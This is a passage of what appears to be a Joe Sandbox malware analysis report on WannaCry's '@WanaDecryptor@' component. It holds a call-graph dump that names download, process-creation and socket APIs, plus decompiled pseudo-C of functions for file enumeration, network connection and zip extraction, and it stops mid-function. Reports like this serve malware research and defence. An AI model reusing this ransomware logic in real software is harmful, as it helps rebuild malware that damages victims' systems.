40dc15 5082->5083 5089 40c013 5082->5089 5084 40dc77 5083->5084 5085 40dc49 5083->5085 5083->5089 5328 412aa0 realloc 5084->5328 5327 412a90 malloc 5085->5327 5088 40dc51 5088->5089 5090 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 5088->5090 5089->5033 5090->5089 5092 40d61e 5091->5092 5093 40dadf setsockopt send shutdown closesocket 5091->5093 5092->5023 5093->5092 5095 40ba27 5094->5095 5096 40ba2b 5095->5096 5142 40b840 sprintf GetFileAttributesA 5095->5142 5096->5053 5098 40ba31 5098->5053 5100 40ba88 5099->5100 5263 40d8c0 5100->5263 5104 40bb62 strtok 5103->5104 5104->5060 5104->5074 5106 40c7d0 5105->5106 5107 40c7bb 5105->5107 5106->5074 5107->5106 5108 40c7d6 #825 5107->5108 5108->5106 5110 40c932 5109->5110 5111 40c92d ?_Xlen@std@ 5109->5111 5112 40c973 5110->5112 5113 40c963 5110->5113 5114 40c946 5110->5114 5111->5110 5117 40c990 5112->5117 5118 40c7b0 #825 5112->5118 5115 40c7b0 #825 5113->5115 5119 40c94a 5114->5119 5267 40c9c0 5114->5267 5116 40c96c 5115->5116 5116->5074 5117->5074 5118->5114 5119->5074 5122 40c81f 5121->5122 5273 40cad0 5122->5273 5124 40c844 5124->5074 5126 40c870 5125->5126 5127 40c8d9 5125->5127 5128 40c8ab #825 5126->5128 5129 40c8a2 #825 5126->5129 5127->5069 5128->5126 5130 40c8cc 5128->5130 5129->5128 5130->5069 5132 40ce68 5131->5132 5133 40ce5a 5131->5133 5135 40ce94 #825 5132->5135 5136 40bd9e #825 Sleep 5132->5136 5133->5132 5134 40ce6e #825 5133->5134 5134->5132 5135->5136 5136->5066 5136->5067 5138 40c761 5137->5138 5139 40c77e #825 5137->5139 5140 40c775 #825 5138->5140 5141 40c76f 5138->5141 5139->5079 5140->5139 5141->5139 5143 40b898 5142->5143 5144 40b95b CreateProcessA 5142->5144 5160 40b6a0 CreateDirectoryA 5143->5160 5146 40b9b4 5144->5146 5147 40b9bf WaitForSingleObject 5144->5147 5146->5098 5148 40b9e4 CloseHandle CloseHandle 5147->5148 5149 40b9d8 WaitForSingleObject 5147->5149 5148->5098 5149->5148 5150 40b8a9 5151 40b8b0 5150->5151 5152 40b8e9 sprintf GetFileAttributesA 5150->5152 5174 40b780 
CreateDirectoryA 5151->5174 5154 40b946 CopyFileA 5152->5154 5155 40b93b 5152->5155 5154->5144 5155->5098 5156 40b8c1 5156->5152 5157 40b780 60 API calls 5156->5157 5158 40b8d9 5157->5158 5158->5152 5159 40b8e0 5158->5159 5159->5098 5182 412920 5160->5182 5163 40b6d8 DeleteFileA 5163->5150 5164 40b6ec 5185 412940 5164->5185 5166 40b719 5166->5150 5167 40b76a 5194 412a00 5167->5194 5168 412940 14 API calls 5170 40b738 sprintf 5168->5170 5191 4129e0 5170->5191 5171 40b770 5171->5150 5173 40b70e 5173->5166 5173->5167 5173->5168 5175 40b81b 5174->5175 5176 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 5174->5176 5175->5156 5177 40b810 DeleteFileA 5176->5177 5178 40b7f6 5176->5178 5177->5175 5179 40b6a0 54 API calls 5178->5179 5180 40b809 5179->5180 5180->5177 5181 40b827 DeleteFileA 5180->5181 5181->5156 5205 4127e0 #823 5182->5205 5184 40b6cf 5184->5163 5184->5164 5186 412964 5185->5186 5187 412959 5185->5187 5188 412969 5186->5188 5218 411cf0 5186->5218 5187->5173 5188->5173 5190 412982 5190->5173 5251 412990 5191->5251 5193 4129f8 5193->5173 5195 412a15 5194->5195 5196 412a09 5194->5196 5197 412a1a 5195->5197 5257 4127a0 5195->5257 5196->5171 5197->5171 5200 412a7d #825 5200->5171 5201 412a44 #825 5202 412a4d 5201->5202 5203 412a61 #825 5202->5203 5204 412a6a #825 5202->5204 5203->5204 5204->5200 5206 412815 5205->5206 5207 41287a 5205->5207 5206->5207 5208 41283d #823 5206->5208 5209 411c00 15 API calls 5207->5209 5208->5207 5210 41289d 5209->5210 5211 4128a6 5210->5211 5212 4128f8 #823 5210->5212 5213 4128e5 5211->5213 5214 4128b4 #825 5211->5214 5215 4128bd 5211->5215 5212->5184 5213->5184 5214->5215 5216 4128d6 #825 5215->5216 5217 4128cd #825 5215->5217 5216->5213 5217->5216 5219 412231 5218->5219 5220 411d11 5218->5220 5219->5190 5220->5219 5221 411ac0 free free 5220->5221 5224 411d27 5220->5224 5221->5224 5222 411d37 5222->5190 5223 411dc2 5225 411ddc 5223->5225 5227 4113e0 SetFilePointer SetFilePointer ReadFile 5223->5227 5224->5222 
5224->5223 5226 411390 SetFilePointer SetFilePointer ReadFile 5224->5226 5228 411350 SetFilePointer SetFilePointer ReadFile 5225->5228 5226->5223 5227->5223 5229 411dfe 5228->5229 5230 411460 SetFilePointer SetFilePointer ReadFile 5229->5230 5231 411e15 5230->5231 5232 411e1c 5231->5232 5233 410a50 SetFilePointer SetFilePointer 5231->5233 5232->5190 5234 411e3e 5233->5234 5235 411e45 5234->5235 5236 411e56 #823 5234->5236 5235->5190 5237 410af0 ReadFile 5236->5237 5238 411e78 5237->5238 5239 411e83 #825 5238->5239 5240 411e9d _mbsstr 5238->5240 5239->5190 5242 411f15 _mbsstr 5240->5242 5242->5240 5243 411f2c _mbsstr 5242->5243 5243->5240 5244 411f43 _mbsstr 5243->5244 5244->5240 5245 411f5a 5244->5245 5246 411b80 SystemTimeToFileTime 5245->5246 5247 412063 LocalFileTimeToFileTime 5246->5247 5250 4120b6 5247->5250 5248 412203 5248->5190 5249 4121fa #825 5249->5248 5250->5248 5250->5249 5252 4129a3 5251->5252 5253 412998 5251->5253 5254 4129a8 5252->5254 5255 412360 28 API calls 5252->5255 5253->5193 5254->5193 5256 4129cf 5255->5256 5256->5193 5258 4127b1 5257->5258 5259 4127a9 5257->5259 5261 4127c7 5258->5261 5262 410f70 FindCloseChangeNotification #825 free free free 5258->5262 5260 411ac0 free free 5259->5260 5260->5258 5261->5200 5261->5201 5261->5202 5262->5261 5265 40d8ec 5263->5265 5264 40daad closesocket 5266 40baa8 5264->5266 5265->5264 5265->5266 5266->5054 5268 40c9f6 #823 5267->5268 5272 40ca40 5268->5272 5270 40ca81 5270->5117 5271 40ca87 #825 5271->5270 5272->5270 5272->5271 5274 40cbf3 5273->5274 5275 40cb00 5273->5275 5274->5124 5276 40cb26 5275->5276 5282 40cb90 5275->5282 5277 40cb31 5276->5277 5278 40cb2c ?_Xran@std@ 5276->5278 5292 40cd80 5277->5292 5278->5277 5279 40cbe9 5281 40cc60 5 API calls 5279->5281 5281->5274 5282->5279 5284 40cbaa 5282->5284 5283 40cb38 5286 40cb6a 5283->5286 5287 40cb47 memmove 5283->5287 5285 40c7b0 #825 5284->5285 5288 40cbb3 5285->5288 5290 40cd80 4 API calls 5286->5290 5309 40cc60 5287->5309 5288->5124 5291 40cb7d 
5290->5291 5291->5124 5293 40cd93 5292->5293 5294 40ce27 5292->5294 5293->5294 5295 40cdd0 5293->5295 5296 40cdc9 ?_Xlen@std@ 5293->5296 5294->5283 5297 40cdf8 5295->5297 5300 40cde2 5295->5300 5296->5295 5298 40ce0a 5297->5298 5299 40cdfc 5297->5299 5298->5294 5305 40c7b0 #825 5298->5305 5301 40c7b0 #825 5299->5301 5302 40cde6 5300->5302 5303 40ce1f 5300->5303 5304 40ce05 5301->5304 5306 40c7b0 #825 5302->5306 5307 40c9c0 2 API calls 5303->5307 5304->5283 5305->5303 5308 40cdf3 5306->5308 5307->5294 5308->5283 5310 40cc73 5309->5310 5311 40cc6e ?_Xlen@std@ 5309->5311 5312 40cd04 5310->5312 5313 40cc88 5310->5313 5314 40ccae 5310->5314 5311->5310 5312->5313 5319 40cd08 5312->5319 5315 40cc90 5313->5315 5318 40c9c0 2 API calls 5313->5318 5317 40ccd9 #825 5314->5317 5321 40ccc4 5314->5321 5315->5286 5316 40cd4c 5322 40c9c0 2 API calls 5316->5322 5317->5321 5318->5315 5319->5315 5319->5316 5320 40cd43 #825 5319->5320 5323 40cd26 5319->5323 5320->5316 5321->5286 5324 40cd5d 5322->5324 5325 40c9c0 2 API calls 5323->5325 5324->5286 5326 40cd3b 5325->5326 5326->5286 5327->5088 5328->5088 5330 412af5 5329->5330 5331 412ac8 free 5329->5331 5330->5044 5331->5330 5333->4862 5335 40c50f 5334->5335 5336 40bed0 110 API calls 5335->5336 5337 40c54b 5336->5337 5338 40c596 5337->5338 5339 40dd00 4 API calls 5337->5339 5340 40dbf0 free 5338->5340 5342 40c568 5339->5342 5341 40c5e7 5340->5341 5341->4864 5342->5338 5343 40c600 5342->5343 5344 40c635 5343->5344 5345 40c617 strncpy 5343->5345 5346 40dbf0 free 5344->5346 5345->5344 5347 40c650 5346->5347 5347->4864 5349 4076d9 time 5348->5349 5351 4076d7 5349->5351 5350 407771 sprintf 5350->5351 5351->5349 5351->5350 5352 405180 4 API calls 5351->5352 5353 407842 SendMessageA SendMessageA #540 5351->5353 5352->5351 5354 407894 5353->5354 5355 4078aa _ftol #2818 #2818 5354->5355 5356 4078db #2818 #2818 5354->5356 5357 407911 #3092 #6199 5355->5357 5356->5357 5358 407990 #800 5357->5358 5359 407940 5357->5359 5358->4888 5359->5358 5360 

                                  Control-flow Graph: function at 0x004080C0
                                  C-Code - Quality: 87%
                                  			E004080C0(intOrPtr __ecx) {
                                  				void _v999;
                                  				char _v1000;
                                  				void* _v1012;
                                  				char _v1100;
                                  				char _v1200;
                                  				char _v1476;
                                  				signed char _v1520;
                                  				intOrPtr _v1648;
                                  				void _v1656;
                                  				intOrPtr _v1660;
                                  				intOrPtr _v1664;
                                  				intOrPtr _v1668;
                                  				intOrPtr _v1672;
                                  				intOrPtr _v1696;
                                  				void _v1788;
                                  				void _v1792;
                                  				void* _v1796;
                                  				char _v1800;
                                  				intOrPtr _v1804;
                                  				intOrPtr _v1808;
                                  				void* _v1820;
                                  				char _t44;
                                  				void* _t47;
                                  				void* _t50;
                                  				void* _t54;
                                  				int _t57;
                                  				int _t60;
                                  				struct _IO_FILE* _t61;
                                  				int _t62;
                                  				struct _WIN32_FIND_DATAA* _t74;
                                  				intOrPtr _t103;
                                  				void* _t104;
                                  				struct _IO_FILE* _t105;
                                  				void* _t110;
                                  				intOrPtr _t113;
                                  				void* _t114;
                                  				void* _t126;
                                  
                                  				_t103 = __ecx;
                                  				memset( &_v1788, 0, 0x21 << 2);
                                  				_t44 =  *0x421798; // 0x0
                                  				_v1000 = _t44;
                                  				_v1808 = _t103;
                                  				memset( &_v999, 0, 0xf9 << 2);
                                  				_t110 =  &_v1808 + 0x18;
                                  				asm("stosw");
                                  				_t74 =  &_v1520;
                                  				_v1804 = 0;
                                  				asm("stosb"); // executed
                                  				_t47 = FindFirstFileA("*.res", _t74); // executed
                                  				_v1796 = _t47;
                                  				if(_t47 == 0xffffffff) {
                                  					L13:
                                  					_push(_v1804);
                                  					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
                                  					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
                                  					_t113 = _t110 + 0x30;
                                  					_push(0);
                                  					_v1808 = _t113;
                                  					L00412CAA();
                                  					_t79 = _t103;
                                  					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
                                  					if(_t54 != 0xffffffff) {
                                  						return _t54;
                                  					}
                                  					_push(0);
                                  					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
                                  					L00412CAA();
                                  					return E004082C0(_t103, _t113 + 0x340, _t79);
                                  				} else {
                                  					goto L2;
                                  					L11:
                                  					_t104 = _v1796;
                                  					_t74 =  &_v1520;
                                  					_t57 = FindNextFileA(_t104, _t74); // executed
                                  					_t124 = _t57;
                                  					if(_t57 != 0) {
                                  						L2:
                                  						if((_v1520 & 0x00000010) == 0) {
                                  							asm("repne scasb");
                                  							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
                                  								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
                                  								_t110 = _t110 + 0xc;
                                  								if(_t60 >= 1) {
                                  									_t61 = fopen( &_v1476, "rb"); // executed
                                  									_t105 = _t61;
                                  									_t110 = _t110 + 8;
                                  									if(_t105 != 0) {
                                  										_t62 = fread( &_v1656, 0x88, 1, _t105); // executed
                                  										_t114 = _t110 + 0x10;
                                  										if(_t62 == 1 && _v1648 == _v1800) {
                                  											_v1804 = _v1804 + 1;
                                  										}
                                  										fclose(_t105); // executed
                                  										_t110 = _t114 + 4;
                                  										if(_v1648 == 0) {
                                  											memcpy( &_v1792,  &_v1656, 0x22 << 2);
                                  											_t110 = _t110 + 0xc;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L11;
                                  					} else {
                                  						FindClose(_t104);
                                  						_t103 = _v1808;
                                  						goto L13;
                                  					}
                                  				}
                                  			}









































                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                  • API String ID: 1530363904-2310201135
                                  • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                  • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph: function at 0x0040D6A0
                                  APIs
                                  • htons.WS2_32 ref: 0040D6C7
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                  • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                  • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                  • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                  • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                  • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                  • closesocket.WS2_32(00000000), ref: 0040D80E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                  • String ID: `
                                  • API String ID: 478405425-1850852036
                                  • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                  • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph: function at 0x00411CF0
                                  C-Code - Quality: 91%
                                  			E00411CF0(intOrPtr* __ecx) {
                                  				intOrPtr _t142;
                                  				signed int _t147;
                                  				signed int _t149;
                                  				intOrPtr _t150;
                                  				void* _t152;
                                  				signed int _t157;
                                  				signed int _t160;
                                  				unsigned int _t162;
                                  				signed char _t164;
                                  				struct _FILETIME _t177;
                                  				struct _FILETIME _t180;
                                  				intOrPtr _t182;
                                  				signed int _t186;
                                  				signed char _t188;
                                  				struct _FILETIME _t204;
                                  				struct _FILETIME _t212;
                                  				signed int _t215;
                                  				signed int _t217;
                                  				signed int _t219;
                                  				intOrPtr* _t226;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				signed int _t234;
                                  				signed int _t235;
                                  				signed int _t239;
                                  				unsigned int _t248;
                                  				signed int _t249;
                                  				int _t252;
                                  				signed char _t264;
                                  				intOrPtr _t269;
                                  				intOrPtr* _t273;
                                  				signed int _t276;
                                  				unsigned int _t297;
                                  				signed int _t299;
                                  				intOrPtr _t300;
                                  				signed int _t303;
                                  				intOrPtr _t307;
                                  				intOrPtr _t309;
                                  				signed int _t311;
                                  				intOrPtr _t312;
                                  				intOrPtr _t313;
                                  				intOrPtr* _t321;
                                  				signed int _t329;
                                  				intOrPtr* _t336;
                                  				void* _t337;
                                  				void* _t338;
                                  				signed int _t340;
                                  				signed int _t341;
                                  				void* _t343;
                                  				void* _t346;
                                  				void* _t348;
                                  				void* _t349;
                                  				void* _t350;
                                  				void* _t351;
                                  				void* _t353;
                                  				void* _t354;
                                  				void* _t355;
                                  				void* _t356;
                                  
                                  				_t312 =  *((intOrPtr*)(_t348 + 0x294));
                                  				_t232 = _t231 | 0xffffffff;
                                  				_t336 = __ecx;
                                  				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
                                  				if(_t312 < _t232) {
                                  					L72:
                                  					return 0x10000;
                                  				} else {
                                  					_t140 =  *__ecx;
                                  					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
                                  						goto L72;
                                  					} else {
                                  						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
                                  							E00411AC0(_t140);
                                  							_t348 = _t348 + 4;
                                  						}
                                  						 *(_t336 + 4) = _t232;
                                  						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
                                  							__eflags = _t312 - _t232;
                                  							if(_t312 != _t232) {
                                  								_t142 =  *_t336;
                                  								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
                                  								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
                                  									E00411390(_t142);
                                  									_t348 = _t348 + 4;
                                  								}
                                  								_t143 =  *_t336;
                                  								__eflags =  *( *_t336 + 0x10) - _t312;
                                  								while(__eflags < 0) {
                                  									E004113E0(_t143);
                                  									_t143 =  *_t336;
                                  									_t348 = _t348 + 4;
                                  									__eflags =  *( *_t336 + 0x10) - _t312;
                                  								}
                                  								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
                                  								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
                                  								_t349 = _t348 + 0x30;
                                  								__eflags = _t147;
                                  								if(_t147 == 0) {
                                  									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
                                  									_t350 = _t349 + 0xc;
                                  									__eflags = _t149;
                                  									if(_t149 == 0) {
                                  										_t150 =  *((intOrPtr*)(_t350 + 0x10));
                                  										_push(_t150); // executed
                                  										L00412CEC(); // executed
                                  										_t313 = _t150;
                                  										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
                                  										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
                                  										_t351 = _t350 + 0x14;
                                  										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
                                  										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
                                  											_t346 =  *(_t351 + 0x29c);
                                  											asm("repne scasb");
                                  											_t248 =  !_t232;
                                  											 *_t346 =  *( *_t336 + 0x10);
                                  											_t337 = _t351 + 0x88 - _t248;
                                  											_t249 = _t248 >> 2;
                                  											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
                                  											__eflags = _t252;
                                  											memcpy(_t337 + _t249 + _t249, _t337, _t252);
                                  											_t353 = _t351 + 0x18;
                                  											_t321 = _t353 + 0x190;
                                  											while(1) {
                                  												_t157 =  *_t321;
                                  												__eflags = _t157;
                                  												if(_t157 == 0) {
                                  													goto L23;
                                  												}
                                  												L21:
                                  												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
                                  												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
                                  													_t321 = _t321 + 2;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												L23:
                                  												__eflags = _t157 - 0x5c;
                                  												if(_t157 == 0x5c) {
                                  													_t321 = _t321 + 1;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												__eflags = _t157 - 0x2f;
                                  												if(_t157 == 0x2f) {
                                  													_t321 = _t321 + 1;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("\\..\\");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t41 = _t157 + 4; // 0x4
                                  													_t321 = _t41;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("\\../");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t42 = _t157 + 4; // 0x4
                                  													_t321 = _t42;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  												}
                                  												_push("/../");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t43 = _t157 + 4; // 0x4
                                  													_t321 = _t43;
                                  													while(1) {
                                  														_t157 =  *_t321;
                                  														__eflags = _t157;
                                  														if(_t157 == 0) {
                                  															goto L23;
                                  														}
                                  														goto L21;
                                  													}
                                  													goto L23;
                                  												}
                                  												_push("/..\\");
                                  												_push(_t321);
                                  												L004132C4();
                                  												_t353 = _t353 + 8;
                                  												__eflags = _t157;
                                  												if(_t157 != 0) {
                                  													_t44 = _t157 + 4; // 0x4
                                  													_t321 = _t44;
                                  													continue;
                                  												}
                                  												asm("repne scasb");
                                  												_t338 = _t321 -  !0xffffffff;
                                  												_t297 =  *(_t353 + 0x70);
                                  												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
                                  												_t354 = _t353 + 0xc;
                                  												 *((char*)(_t354 + 0x13)) = 0;
                                  												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
                                  												_t355 = _t354 + 0xc;
                                  												_t164 = _t162 >> 0x0000001e & 0x00000001;
                                  												_t264 =  !(_t297 >> 0x17) & 0x00000001;
                                  												_t340 =  *(_t355 + 0x3c) >> 8;
                                  												__eflags = _t340;
                                  												 *(_t355 + 0x12) = 0;
                                  												_t234 = 1;
                                  												if(_t340 == 0) {
                                  													L39:
                                  													_t264 = _t297 & 0x00000001;
                                  													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
                                  													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
                                  													_t164 = _t297 >> 0x00000004 & 0x00000001;
                                  													_t299 = _t297 >> 0x00000005 & 0x00000001;
                                  													__eflags = _t299;
                                  													_t234 = _t299;
                                  												} else {
                                  													__eflags = _t340 - 7;
                                  													if(_t340 == 7) {
                                  														goto L39;
                                  													} else {
                                  														__eflags = _t340 - 0xb;
                                  														if(_t340 == 0xb) {
                                  															goto L39;
                                  														} else {
                                  															__eflags = _t340 - 0xe;
                                  															if(_t340 == 0xe) {
                                  																goto L39;
                                  															}
                                  														}
                                  													}
                                  												}
                                  												_t341 = 0;
                                  												__eflags = _t164;
                                  												 *(_t346 + 0x108) = 0;
                                  												if(_t164 != 0) {
                                  													 *(_t346 + 0x108) = 0x10;
                                  												}
                                  												__eflags = _t234;
                                  												if(_t234 != 0) {
                                  													_t219 =  *(_t346 + 0x108) | 0x00000020;
                                  													__eflags = _t219;
                                  													 *(_t346 + 0x108) = _t219;
                                  												}
                                  												__eflags =  *(_t355 + 0x13);
                                  												if( *(_t355 + 0x13) != 0) {
                                  													_t217 =  *(_t346 + 0x108) | 0x00000002;
                                  													__eflags = _t217;
                                  													 *(_t346 + 0x108) = _t217;
                                  												}
                                  												__eflags = _t264;
                                  												if(_t264 != 0) {
                                  													_t215 =  *(_t346 + 0x108) | 0x00000001;
                                  													__eflags = _t215;
                                  													 *(_t346 + 0x108) = _t215;
                                  												}
                                  												__eflags =  *(_t355 + 0x12);
                                  												if( *(_t355 + 0x12) != 0) {
                                  													_t63 = _t346 + 0x108;
                                  													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
                                  													__eflags =  *_t63;
                                  												}
                                  												_t300 =  *((intOrPtr*)(_t355 + 0x58));
                                  												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
                                  												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
                                  												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
                                  												_t356 = _t355 + 8;
                                  												 *(_t356 + 0x30) = _t177;
                                  												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
                                  												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
                                  												_t180 =  *(_t356 + 0x28);
                                  												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
                                  												 *(_t346 + 0x10c) = _t180;
                                  												 *(_t346 + 0x114) = _t180;
                                  												 *(_t346 + 0x11c) = _t180;
                                  												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
                                  												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
                                  												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
                                  												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
                                  												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
                                  													_t329 =  *(_t356 + 0x1c);
                                  												} else {
                                  													_t329 =  *(_t356 + 0x1c);
                                  													 *((char*)(_t356 + 0x1a)) = 0;
                                  													do {
                                  														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
                                  														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
                                  														_t273 = "UT";
                                  														_t186 = _t356 + 0x18;
                                  														while(1) {
                                  															_t235 =  *_t186;
                                  															_t303 = _t235;
                                  															__eflags = _t235 -  *_t273;
                                  															if(_t235 !=  *_t273) {
                                  																break;
                                  															}
                                  															__eflags = _t303;
                                  															if(_t303 == 0) {
                                  																L57:
                                  																_t186 = 0;
                                  															} else {
                                  																_t239 =  *((intOrPtr*)(_t186 + 1));
                                  																_t311 = _t239;
                                  																_t92 = _t273 + 1; // 0x2f000054
                                  																__eflags = _t239 -  *_t92;
                                  																if(_t239 !=  *_t92) {
                                  																	break;
                                  																} else {
                                  																	_t186 = _t186 + 2;
                                  																	_t273 = _t273 + 2;
                                  																	__eflags = _t311;
                                  																	if(_t311 != 0) {
                                  																		continue;
                                  																	} else {
                                  																		goto L57;
                                  																	}
                                  																}
                                  															}
                                  															L59:
                                  															__eflags = _t186;
                                  															if(_t186 == 0) {
                                  																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
                                  																_t343 = _t341 + 5;
                                  																_t276 = 1;
                                  																__eflags = _t188 & 0x00000001;
                                  																 *((char*)(_t356 + 0x12)) = 1;
                                  																if((_t188 & 0x00000001) != 0) {
                                  																	_t309 =  *((intOrPtr*)(_t343 + _t329));
                                  																	_t343 = _t343 + 4;
                                  																	__eflags = 0 << 8;
                                  																	_t212 = E00411B50(_t309, 0 << 8 << 8);
                                  																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                  																	 *(_t346 + 0x11c) = _t212;
                                  																	_t356 = _t356 + 4;
